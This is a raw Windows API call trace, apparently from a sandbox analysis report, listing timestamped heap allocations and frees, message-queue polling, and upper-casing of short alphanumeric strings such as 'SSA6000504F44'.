[0206.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0206.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.837] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0206.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.838] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.838] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.838] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0206.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0206.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0206.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0206.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17d25) returned 0x24d7a58 [0206.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1828 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1848 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0206.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17d25) returned 0x34c9f80 [0206.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0206.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0206.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0206.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.843] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.843] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0206.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.844] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.844] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.845] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.846] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.847] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.847] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.848] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.851] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0206.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.868] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.868] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.869] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.869] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.869] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.869] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.870] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.870] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 